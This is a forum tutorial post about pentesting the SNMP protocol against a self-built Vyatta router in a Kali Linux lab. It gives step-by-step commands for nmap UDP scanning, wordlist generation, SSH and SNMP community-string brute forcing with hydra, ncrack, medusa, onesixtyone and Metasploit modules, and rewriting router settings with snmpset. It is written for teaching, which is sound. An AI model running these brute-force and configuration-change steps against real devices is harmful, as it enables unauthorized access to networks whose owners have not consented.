Activity Discussions Ethical Hacking Tutorials SNMP Pentesting

  • SNMP Pentesting

  • nikki

    May 7, 2020 at 8:23 am


    hi there this is nikhil

    in this i am gonna explain you how to pentest snmp protocol

    i assume u know basics of snmp protocol

    if you dont

    then i have these links for you where you can get better understanding of SNMP protocol

    even you know i suggest you to take time and read this,helps in revision



    i assume you have already setup kali linux on your hyperv

    if you dont have setup kali linux

    there are many youtube tutorials on how to setup kali linux in virtualization enivronment

    even i have made tutorial on youtube

    i hope you are ready with kali linux

    we need to simulate our snmp service

    for that we use a router called ‘vyatta’

    Download here

    Load it into VMware or your VirtualBox

    Start the VM


    it boots

    it had booted in live mode

    it asks for credentials

    default credentials are



    after login we need to install vyatta on harddisk

    for that type this in command line

    $install image

    then hit Enter

    it asks you for basic info like

    for almost all options u click enter (default)


    now for the above option write Ýes and then hit enter

    now it asks for a password

    set your favourite or set default ‘vyatta’


    now start vyatta vm

    we need to enable some services on our vyatta inorder to start pentesting


    you can see your shell prompt is in ‘$’



    to enter into configuration mode

    and enter

    set service ssh

    we have enabled ssh and we need to save our changes

    for that type



    now we need to set ip address for our vm , type

    ( iassume u r still in config mode)

    set interfaces ethernet eth0 address

    now hit enter

    you can check ip address by typing

    show interfaces

    try to ping from vyatta ( in my case ) to kali linux ( in my case)


    full view of my network

    i setup using gns3 simulator

    dont worry even in simple vmware setup it works


    we wlill setup ssh(already done),telnet,https,snmp

    syntax will be similar

    set service service-type

    here snmp community strings are like passwords

    i set them as ‘public’ and ‘private’ because out of the box they come with those strings and netadmins forget to change the default strings

    our setup was almost complete and if we want to configure anything

    (if i forgot) we do that later


    now lets do basic nmap scan aganist my vyatta –

    nmap -sV -n

    -sV for version scanning

    -n for dnsname lookup ,adjust with ip only lol

    we got some info about services that are running on vyatta

    but where is snmp?

    its a udp protocol

    by default nmap scans tcp ports

    and lot of pentesters forget about udp scanning

    so lets scan with -sU option

    it took me lot of time to scan

    as we know snmp service is running lets directly scan that snmp ports

    161 and 162

    161 is for nms to send queries to agents

    and 162 is for agents to contact or inform to nms

    nmap -sV -n -sU -p161,162

    -sU for scanning udp ports

    -p for specfiying user interested ports

    as we can see 161 port is open and running SNMPv1

    lets run nmap inbuilt scripts with -sC option

    nmap -sV -n -sU -p161 -sC

    -sC for use default nmap scripts

    we got a ton of information about device because nmap scripts used defualt credentials of snmp which are ‘public’ and ‘private’

    take a look and try to understand different things

    small exercise to you :

    change those default strings and nmap scripts again

    now notice the output


    now we setup a user on vyatta and try to bruteforce login credentials

    logon to vyatta and type configure to enter into configuration mode

    now type

    set system login user admin authentication plaintext-password aaaa

    now commit and save

    now we have to generate our wordlist

    lets generate simple wordlist

    we use crunch to generate our wordlist

    crunch 4 4 abcd > wordlist

    we use some tools to bruteforce ssh login


    type this command to bruteforce

    hydra -l admin -P wordlist ssh

    -l for username

    -L for list of usernames

    -p password

    -P for list of passwords

    wordlist- my wordlist

    ssh-protocol i want to bruteforce

    as you can see hydra successfully found the password ‘aaaa’


    type this syntax

    ncrack -v -T 5 –user admin -P wordlist

    -v for verbose that means we can know whats happening

    -T 5 use 5 threads

    –user for username

    you didnot see password on the output

    you think its failed right?

    yeah it failed

    but i can run it again and show when it succeeded

    but what i want is

    you need to understand that some tools fail at some time

    so always dont rely on one tool

    learn more tools and how they work and if time permits learn python and write your own scripts


    type this syntax

    medusa -h -u admin -P wordlist -M ssh

    -h for host

    -u for username

    -P for list of passwords

    -M for module you want to execute

    if you want to know what modules medusa support


    medusa -d

    medusa succeeded


    heres my best friend metasploit

    i love metasploit more than my girlfriend(who doesnot exist)

    first we need to setup database to make metasploit searches faster and also to store results

    service postgresql start

    and then type


    following screenshows up

    now to brute force ssh

    we need to search for ‘ssh_login’

    its a module thats inbuilt in metasploit

    after typing

    search ssh_login

    we gonna use first one

    for that we need to use ‘use’

    type this

    use auxiliary/scanner/ssh/ssh_login

    now you get this

    after that type

    show options

    now you get

    so much output

    dont worry

    take time to understand whats that

    thats parameters required to bruteforce

    we gonna use main ones

    we gonna set rhosts to our vyatta vm

    set rhosts

    and username to admin

    set username admin

    and passwordfile to our wordlist path

    set pass_file /root/Desktop/wordlist

    set stop_on_success true

    type run and hit enter

    successful password is ‘aaaa’

    and u can also notice that command shell is also opened

    now you can interact with that shell

    type exit to exitout of the session


    first lets delete our public and private community strings


    delete service snmp community public

    delete service snmp community private

    and i set ‘bbbb’ as ro string and ‘cccc’ as rw string


    before we used -sC to use nmap default scripts

    now we use snmp-brute script to bruteforce snmp strings

    type this

    nmap -sU -p 161 -n –script snmp-brute –script-args snmp-brute.communitiesdb=/root/Desktop/wordlist


    we got snmp community strings ‘bbbb’ and ‘cccc’


    metasploit be like : you cant live without me! where did that bring you? BACK 2 ME

    now we use snmp_login module for bruteforcing

    search snmp_login

    use auxiliary/scanner/snmp/snmp_login

    now guess what we type?


    show options

    as you can see bunch of stuff similar to when we used ssh_login module

    in this also we only use main ones

    set rhosts

    set pass_file /root/Desktop/wordlist

    set stop_on_success true

    i think these are main ones

    u can customize yourself

    i suggest you to set threads to 10

    its gonna be slow if u dont set

    its gonna take really long time

    now i reduced items and run again


    similar syntax as that of ssh

    medusa -h -u admin -P wordlist1 -M snmp

    medusa also succeeded


    onesixtyone is also tool used to bruteforce snmp community strings

    as name says 161 is port of snmp , thus named

    onesixtyone -c wordlist

    got community strings as expected


    ok we got the community strings , now what?

    we can read and know the configuration of the network and also other information that is stored in that router

    lets get started


    this tool walks along the OID by get-next requests and gets all the info you needed

    snmpwalk -v1 -c bbbb

    -v1 is the snmp version number

    -c is community string

    you get ton of information

    ok what is this information?

    all the information is stored in object and its accessed using numbers

    you can copy paste any oid and check here

    ok can we modify the value?

    yes because we have rw string which is ‘ccc’

    ok how we can modify?

    we use


    ok lets modify the vyatta name and its oid is


    snmpset -v1 -c cccc iso. s hacked

    s for string notation

    its saying that value changed

    lets check by running snmpwalk again

    snmpwalk -v1 -c bbbb |head -10

    head command gives only first 10 lines of output

    as you can see our ‘vyatta’ string has changed into ‘hacked’

    you may find that with snmpwalk we are getting in oid format and we need a conversion like what ip address its using,sys configuration etc

    for that we have


    snmpcheck -c cccc -t

    -t for specifying target

    you can now easily understand the output than snmpwalk


    again huh?

    hell yeah

    there are some snmp post exploitation modules inorder to get information


    search snmp_enum

    now as usual type

    show options

    set community ccc

    set rhosts


    you get lot of output showing sys information,processes running and so much


    as the name implies that this modules modifies the oid values as snmpset command

    as normal

    search snmp_set

    use path_to_snmp_set

    show options

    set rhosts

    set community cccc

    set oid iso.


    now u get error because of ‘iso ‘ in our oid string

    we need to convert it into number

    as we know value of iso is 1 (top of tree)

    set oid

    set oidvalue value_you_want_to_set


    we check using snmpwalk command


    there is a tool to convert oid strings to values

    we need to find oid number of ‘iso’

    we can use


    snmptranslate -On iso.

    sorry only 2 photos are showing

    i hope u get more understand when u r doing this practically

Log in to reply.

Original Post
0 of 0 posts June 2018
SECARMY - Security and Research Community